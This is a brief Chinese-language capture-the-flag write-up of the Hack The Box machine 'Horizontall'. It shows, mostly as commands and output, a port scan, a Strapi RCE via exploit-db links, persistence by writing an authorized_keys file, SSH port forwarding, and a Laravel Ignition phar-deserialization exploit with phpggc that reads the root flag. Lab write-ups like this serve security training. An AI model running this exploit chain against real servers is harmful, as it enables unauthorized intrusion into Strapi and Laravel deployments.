Horizontall
Data: August 31, 2021
Level: Easy
Summarize: 1、js 得到子域名
2、jwt 得到 rce strapi
3、ssh端口转发
4、Laravel V8 rce
Tags: Laravel, 端口转发
端口扫描
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
在 js 文件中得到了一个子域名
exp利用
https://www.exploit-db.com/exploits/50239
https://www.exploit-db.com/exploits/50237
strapi
$ netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1789/node /usr/bin/
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -本地还开放了 8000 1337 端口
curl 127.0.0.1:8000
正在运行 Laravel v8
使用 ssh 将端口转发出来
在用户家目录创建 .ssh kal 生成 authorized_keys 传至主机
➜ .ssh cat id_rsa.pub > authorized_keys端口转发
ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@horizontall.htbRoot
➜ phpggc git:(master) php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /root/root.txt"
➜ phpggc git:(master) python3 ../laravel-exploits/laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
d81660812e51818997acccae1f11ef9b
--------------------------
+ Logs cleared参考
Strapi CVE-2019-18818 password reset vulnerability